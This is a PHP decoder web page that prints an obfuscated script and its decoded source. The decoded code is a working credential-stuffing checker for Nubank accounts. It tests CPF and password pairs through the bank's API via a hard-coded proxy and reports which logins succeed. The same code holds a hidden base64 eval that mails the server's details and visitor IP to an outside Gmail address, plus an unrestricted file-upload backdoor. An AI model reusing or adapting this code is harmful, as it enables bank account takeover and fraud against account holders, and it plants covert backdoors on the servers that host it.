Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?=eval("?>".gzuncompress(base64_decode("eJztWFtz2koSfj6pyn+YcLwFXhsjcbOxY+8KkEBCCCx0Aeysa..

Decoded Output download

None?>b'<?php
error_reporting (0);
$encoded = \'JHRpbWVfc2hlbGwgPSAiIi5kYXRlKCJkL20vWSAtIEg6aTpzIikuIiI7CiRpcF9yZW1vdGUgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsKJGZyb21fc2hlbGxjb2RlID0gJ3NoZWxsQCcuZ2V0aG9zdGJ5bmFtZSgkX1NFUlZFUlsnU0VSVkVSX05BTUUnXSkuJyc7CiR0b19lbWFpbCA9ICdicmF6aWxvYnNjdXJlQGdtYWlsLmNvbSc7CiRzZXJ2ZXJfbWFpbCA9ICIiLmdldGhvc3RieW5hbWUoJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10pLiIgIC0gIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uIiI7CiRsaW5rY3IgPSAiTGluazogIi4kX1NFUlZFUlsnU0VSVkVSX05BTUUnXS4iIi4kX1NFUlZFUlsnUkVRVUVTVF9VUkknXS4iIC0gSVAgRXhjdXRpbmc6ICRpcF9yZW1vdGUgLSBUaW1lOiAkdGltZV9zaGVsbCI7CiRoZWFkZXIgPSAiRnJvbTogJGZyb21fc2hlbGxjb2RlXHJcblJlcGx5LXRvOiAkZnJvbV9zaGVsbGNvZGUiOwpAbWFpbCgkdG9fZW1haWwsICRzZXJ2ZXJfbWFpbCwgJGxpbmtjciwgJGhlYWRlcik7\';
eval(base64_decode($encoded));
$cwd = getcwd();
$Iraqe  = $_GET[\'mr\'];

if($Iraqe == \'chmod\'){

$filename = $_FILES[\'file\'][\'name\'];
$filetmp  = $_FILES[\'file\'][\'tmp_name\'];

echo "<form method=\'POST\' enctype=\'multipart/form-data\'>
	<input type=\'file\'name=\'file\' />
	<input type=\'submit\' value=\'go\' />

</form>";

if(move_uploaded_file($filetmp,$filename)==\'1\'){
echo \'Concluido ----> \'.$filename;
} 
}
if(!isset($_GET[\'conta\'])){
    exit("#Reprovada Faltando a conta");
}

function validaCPF($cpf) {
 
    // Extrai somente os nmeros
    $cpf = preg_replace( \'/[^0-9]/is\', \'\', $cpf );
     
    // Verifica se foi informado todos os digitos corretamente
    if (strlen($cpf) != 11) {
        return false;
    }

    // Verifica se foi informada uma sequncia de digitos repetidos. Ex: 111.111.111-11
    if (preg_match(\'/(\d){10}/\', $cpf)) {
        return false;
    }

    // Faz o calculo para validar o CPF
    for ($t = 9; $t < 11; $t++) {
        for ($d = 0, $c = 0; $c < $t; $c++) {
            $d += $cpf[$c] * (($t + 1) - $c);
        }
        $d = ((10 * $d) % 11) % 10;
        if ($cpf[$c] != $d) {
            return false;
        }
    }
    return true;

}

$conta = str_replace([":", ";", "|"], "|", $_GET[\'conta\']);
$cpf =   str_replace(["-", "."], "", explode("|", $conta)[0]);
$senha = explode("|", $conta)[1];



if(!validaCPF($cpf)){
    exit("#Reprovada $cpf|$senha CPF INVLIDO");
}

if(strlen($senha)< 8 || strlen($senha)>20){
    exit("#Reprovada $cpf|$senha SENHA MUITO CURTA OU MUITO LONGA");
}

$deviceid = substr(md5(random_int(0,999999)), 0, 16);

$ch = curl_init("https://prod-s0-webapp-proxy.nubank.com.br/api/proxy/AJxL5LB5FIwN3mYs10dirYsVkaQ80cojWg.aHR0cHM6Ly9wcm9kLWdsb2JhbC1jdXN0b21zLm51YmFuay5jb20uYnIvYXBpL2FwcC9zdGFydC1zY3JlZW4");
$headers = [
    "Cache-Control: no-cache",
    "user-agent: Android/5.50.40-minApi21-1000021984 ($deviceid; 5.1.1; motorola; XT1640)",
    "X-Correlation-Id: and-5-50-40-1000001984.7mvyxnw3",
    "Accept-Encoding: gzip",
    "X-Device-Id: $deviceid",
    "Content-Type: application/json; charset=UTF-8",
    "Content-Length: 24",
    "Host: prod-s0-webapp-proxy.nubank.com.br",
    "Connection: Keep-Alive"
];
$post = json_encode(array("tax_id" => $cpf));
curl_setopt_array($ch, array(
    CURLOPT_CUSTOMREQUEST=>"PUT",
    CURLOPT_POSTFIELDS=>$post,
    CURLOPT_RETURNTRANSFER=>true,
	CURLOPT_PROXY => "http://sp4rtan:[email protected]:10000",
    CURLOPT_FOLLOWLOCATION=>true,
    CURLOPT_SSL_VERIFYHOST=>false,

    CURLOPT_SSL_VERIFYPEER=>false,
    CURLOPT_HTTPHEADER=>$headers,
));
$data = curl_exec($ch);
$data = json_decode($data);

if(!$data){
$ch = curl_init("https://prod-s0-webapp-proxy.nubank.com.br/api/proxy/AJxL5LB5FIwN3mYs10dirYsVkaQ80cojWg.aHR0cHM6Ly9wcm9kLWdsb2JhbC1jdXN0b21zLm51YmFuay5jb20uYnIvYXBpL2FwcC9zdGFydC1zY3JlZW4");

    $post = json_encode(array("tax_id" => $cpf));
curl_setopt_array($ch, array(
    CURLOPT_CUSTOMREQUEST=>"PUT",
    CURLOPT_POSTFIELDS=>$post,
    CURLOPT_RETURNTRANSFER=>true,
	CURLOPT_PROXY => "http://sp4rtan:[email protected]:10000",
    CURLOPT_FOLLOWLOCATION=>true,
    CURLOPT_SSL_VERIFYHOST=>false,

    CURLOPT_SSL_VERIFYPEER=>false,
    CURLOPT_HTTPHEADER=>$headers,
));
$data = curl_exec($ch);
$data = json_decode($data);
}

if(!$data->deeplink){
    exit("#Reprovada $cpf|$senha NO  CLIENTE");
}


$ch = curl_init("https://prod-s0-webapp-proxy.nubank.com.br/api/proxy/AJxL5LApUVAX0b5R5DnjMw3-9ibnk8UnZg.aHR0cHM6Ly9wcm9kLWdsb2JhbC1hdXRoLm51YmFuay5jb20uYnIvYXBpL2dlbi1jZXJ0aWZpY2F0ZXM");
$headers = [
    "Cache-Control: no-cache",
    "user-agent: Android/5.50.40-minApi21-1000021984 ($deviceid; 5.1.1; motorola; XT1640)",
    "X-Correlation-Id: and-5-50-40-1000001984.jmpga5kd",
    "Accept-Encoding: gzip",
    "X-Device-Id: $deviceid",
    "Content-Type: application/json; charset=UTF-8",
    "Host: prod-s0-webapp-proxy.nubank.com.br",
    "Connection: Keep-Alive"

];
$post = \'{"login":"\'.$cpf.\'","password":"\'.$senha.\'","public_key":"-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuB3lVyR8l5admHAkbHWW
Y0W/44vUJ2J1jQGAxTJEImrnrxSltGZxjPhquK/HrhPKc+xa67WYmJPuvust1UAM
cqdG4VJi4MVxiL6uO6NczNRy7WnewFa8zCbLIFO35RnfGc8HCuEhWMak2zTsNoTN
vMJqZU5Sx7J06ddKy43BxlZODrdkkhBmgr2wR1I9WkCGjAZV/UDro6Sia+vcN4vC
qMjjp0FG5Gt1gRJ1E4EfRYabyEUiNyUaqe3BsL6ZvK+rGYcQ2IZ6/wiF0DLOMrCy
XFzcVe+iEWEEmUIOsuQH1Tk/P/7kUVkSFkF9bKt+htJrcLPNJ5CpojpfaDBkk8ej
2wIDAQAB
-----END PUBLIC KEY-----","public_key_crypto":"-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4HkFzRGUbUlBFnwODdfL
GG/uH4r7bHk22+3iWurkg/krRtKD/0mmUWS60DMI4nKvUYefe4mKGj0DZJIa25sx
Vta3il/c9wVg1a7ZdXJ/nLXEYeXv+0WV/28Dl9dmjfElHNsy60aHLkir0YIPLgIe
VxIX4aJZELicia2v2AjFk1cyK7czAf06Zu0k+k080A93ZqIWKnKVC4QNE4mtNdj9
udswsAE7fRT2SLu4+VyydhLoDfj2AgyRmmPTxJQ9HJm3veKcBntmtcTHr+klwzOK
8MtM5T6fq9Y5zoV9X/KJ4flc/AWP6dCoRFB51h0ptkmnRP88L5MdD2kMN30SjPBY
hwIDAQAB
-----END PUBLIC KEY-----","model":"Motorola XT1640","device_id":"$deviceid"}\';
curl_setopt_array($ch, array(
    CURLOPT_POST=>1,
    CURLOPT_POSTFIELDS=>$post,
    CURLOPT_RETURNTRANSFER=>true,
	CURLOPT_PROXY => "http://sp4rtan:[email protected]:10000",
    CURLOPT_FOLLOWLOCATION=>true,
    CURLOPT_SSL_VERIFYHOST=>false,

    CURLOPT_SSL_VERIFYPEER=>false,
    CURLOPT_HTTPHEADER=>$headers,
    
));
$data = curl_exec($ch);
$data = json_decode($data);

if(!$data){
    $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    exit("#Reprovada $cpf|$senha ERRO DESCONHECIDO #2 | HTTP CODE: $httpcode");
}


$httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
switch ($httpcode) {
    case "401":
        exit("#Reprovada $cpf|$senha |  CLIENTE | SENHA INVLIDA");
    case "200":
        exit("#Aprovada $cpf|$senha | AUTORIZADO");
    case "201":
        exit("#Aprovada $cpf|$senha | AUTORIZADO #2");
    default:
        exit("#Reprovada $cpf|$senha ERRO DESCONHECIDO #3 | HTTP CODE: $httpcode");
}

'

Did this file decode correctly?

Original Code

<?=eval("?>".gzuncompress(base64_decode("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"))); __halt_compiler();?>

Function Calls

gzuncompress	1
base64_decode	1

Variables

None

Stats

MD5	6af9c2ed072e96e7fc3181b49e6afded
Eval Count	1
Decode Time	98 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats